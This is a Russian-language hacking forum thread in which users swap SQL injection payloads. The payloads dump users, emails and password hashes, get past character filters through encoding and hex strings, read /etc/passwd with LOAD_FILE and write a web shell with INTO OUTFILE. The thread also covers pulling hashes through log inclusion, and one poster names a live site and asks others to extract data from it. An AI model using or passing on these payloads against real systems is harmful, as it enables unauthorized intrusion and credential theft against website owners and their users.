Вообщем всем привет, есть пару вопросов очень надеюсь на вашу помощь…
Имеем к примеру SQL-inj на сайте типа:
bagsql.ru/index.php?id=-1+union+select+1,2,3/*
Выводится 2-ечка, есть возможность посмотреть VERSION() USER() и т.д, но фильтруются символы, пробовал CHAR() текст выводится , но вопрос заключается в том что я 100% уверен что там есть таблица users в которой присутствуют usid, email, usname, uspwd дак вот составляя такой вот запрос:
bagsql.ru/index.php?id=-1+union+select+1,usname,3+from+users/*
Получаю ошибку… Мне кажется что это из-за фильтра… хотя хз… Посоветуйте как быть, PlizZZe.
Ещё возник один вопросик, если я не могу выполнить LOAD_FILE() //пробовал даже кодировать через CHAR(), то выполнится ли OUTFILE? И можно ли тоже использовать кодирование?
И на последок малёк ОФФтоп. Есть инкулуд, могу читать passwd, нет прав на shadow, куда ещё можно залезть для поиска хешей? Если не трудно то напишите плиз пути.
//Слышал что можно в логах нарыть пассы, реально ли?
Всем спасибо, кто чем поможет, с меня репа.

http://www.bagsql.ru/index.php?id=-1+union+select+1,concat_ws(0x3b,usid,email,usname, uspwd)+from+mysql.users+limit+1,1/*
Экранирование кавычек - маленький шанс что зальешь шелл т.к. указать путь будет очень сложно =\

Isis, concat_ws(0x3b,usid,email,usname, uspwd) и mysql.users O_o :-| ?

2 автор: может ссылку норм дашь? :)
но фильтруются символы
т.е. цифры выводятся, символы - нет
может проблема в кодировке?
bagsql.ru/index.php?id=-1+union+select+1,convert(usname+using+cp1251),3+fr om+users/*]
вместо cp1251 - кодировка.

либо поуниверсальнее можешь ввести

bagsql.ru/index.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(usname,0x 55),0x55),3+from+users/*

или как nitrox говорит.

И на последок малёк ОФФтоп. Есть инкулуд, могу читать passwd, нет прав на shadow, куда ещё можно залезть для поиска хешей? Если не трудно то напишите плиз пути.
попробуй проинклудить логи апача, предварительно нужно послать запрос на сервер, тема уже поднималась

Ссылку в студию. Sql иньекция- такая вещь, с которй надо работать на месте, разбиратся с конкретным случаем

Isis насчет кавчек бред =))

если есть файл прив, то нас спасает кодирование в base64

то есть у нас есть LOAD_FILE('/etc/passwd'), кодируем /etc/passwd И получаем 2f 65 74 63 2f 70 61 73 73 77 64, то бишь LOAD_FILE(0x2f6574632f706173737764)

также поступаем во всех местах где юзаются кавычки.. например запрос ..
./index.php?id=-31337+union+select+username,2,3,4,5+from+users+whe re+group='admin'/*

опять же admin = 61 64 6d 69 6e

./index.php?id=-31337+union+select+username,2,3,4,5+from+users+whe re+group=0x61646d696e/*

и тд..

Isis насчет кавчек бред =))

если есть файл прив, то нас спасает кодирование в base64

то есть у нас есть LOAD_FILE('/etc/passwd'), кодируем /etc/passwd И получаем 2f 65 74 63 2f 70 61 73 73 77 64, то бишь LOAD_FILE(0x2f6574632f706173737764)

также поступаем во всех местах где юзаются кавычки.. например запрос ..
./index.php?id=-31337+union+select+username,2,3,4,5+from+users+whe re+group='admin'/*

опять же admin = 61 64 6d 69 6e

./index.php?id=-31337+union+select+username,2,3,4,5+from+users+whe re+group=0x61646d696e/*

и тд..
br, как ты укажешь путь в base64?
Например
select+1,2+from+mysql.users+into+outfile+'/home/usr1/www/'/*
Как ты здесь путь в base64 декодируешь??Нифига не получиться =)

Какой еще бэйсшиссятчитыре , это хекс :)

Outfile/dumpfile требует указания имени файла ТОЛЬКО в ковычках

Во-первых: не base64, a hex.
Во-вторых:


select+1,2+from+mysql.users+into+outfile+0x2f686f6 d652f757372312f7777772f /*


У мну на пятом мускуле при задании outfile таким образом отработало на ура.

Спасиб, узнал много интересного, но это для общего развития, на самом деле там был приведён простой банальный пример, в котором я показал проблемы с которыми столкнулся, т.е реальный сайтик имеет MySQL-inj но она не видимая вот собственно линк где всё можно увидеть сомаму
http://333.by/newsdet.php?nid=2+and+1=0+union+select+1,2,3,VERSI ON(),5,6,7,8,9,10/*
Если кто сможет что-нить реальное вытянуть отпишите плиз в личку или сюда. А то я так понимаю этот нюанс спорный и всем будет интересно узнать как же быть.
Ещё до конца не раскрыт вопрос OUTFILE… Но щя попробую за_hex_ить адресок и гляну получится или нет.
ЗЫ: Ni0x, пасиб, нашёл топик щя тож буду пробовать!

Здесь нет прав, единственное что можешь сделать это вытянуть логин и пароль админа(если таковой есть) и уже в админке смотреть какие скрипты есть..

Экранирование кавычек - маленький шанс что зальешь шелл (https://forum.antichat.ru/threadnav43671-1-10.html) т.к. указать путь будет очень сложно =\
Если есть привелегии обойти не проблема.

Outfile/dumpfile требует указания имени файла ТОЛЬКО в ковычках
Нефига подобного Читай манулалы по 5 скулю.
Пример Helios (member.php?u=31787) тебе таму подтвержнеие сам.

Это в пятом , я до сих пор в четвертом и мануал по четвертому читал %) Пятая стоит на меньшем кол-ве серверов